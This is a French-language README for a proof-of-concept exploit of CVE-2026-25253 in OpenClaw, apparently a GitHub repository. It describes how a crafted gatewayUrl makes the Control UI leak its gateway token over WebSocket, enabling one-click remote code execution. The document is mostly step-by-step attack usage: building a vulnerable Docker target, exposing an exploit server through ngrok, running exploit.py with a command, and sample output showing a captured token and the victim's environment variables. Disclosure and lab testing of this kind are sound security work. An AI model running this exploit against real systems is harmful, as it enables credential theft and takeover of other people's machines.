
Proof-of-concept d'exploit pour CVE-2026-25253 dans OpenClaw : un gatewayUrl spécialement conçu exfiltre le jeton de passerelle de l'interface Control UI, permettant un accès non autorisé à la passerelle et une exécution de code à distance en 1 clic.
★ CVE-2026-25253 OpenClaw Exécution de code à distance en 1 clic PoC ★
https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e
CVE-2026-25253 : Vulnérabilité d'exfiltration de jeton d'authentification OpenClaw
description : OpenClaw (alias clawdbot ou Moltbot) avant la version v2026.1.29 permet aux attaquants d'exfiltrer un jeton d'authentification de passerelle stocké en fournissant une valeur de chaîne de requête gatewayUrl spécialement conçue à l'interface de contrôle (Control UI), qui établit automatiquement une connexion WebSocket sans validation ni confirmation de l'utilisateur. Cela peut conduire à un accès non autorisé à la passerelle et à une exécution de code à distance en 1 clic.
Dockerfile — construit l'environnement vulnérable OpenClawtemplates/ — pages web malveillantes utilisées par l'exploitconfig.txt — configuration OpenClaw utilisée dans l'environnement victimeexploit.py — serveur d'exploitationrequirements.txt — dépendances du PoCdocker build -t openclaw-vuln .
docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
ssh-keygen -R [127.0.0.1]:2222
ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
http://127.0.0.1:18789/
d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66config.txtpip3 install -r requirements.txt
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar xzf ngrok-v3-stable-linux-amd64.tgz
./ngrok authtoken YOUR_TOKEN
./ngrok http 13337
python3 exploit.py --host YOUR_NGROK_HOSTNAME --command "env"
Exemple :
python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
[*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
[*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66
==================================================
[!] EXPLOIT RESULT CAPTURED [!]
==================================================
HOSTNAME=openclaw-vuln
PWD=/root
HOME=/root
...
==================================================
Nous publions une analyse de CVE et de malware une fois par mois. Si cela vous intéresse, veuillez suivre les liens ci-dessous pour consulter nos publications.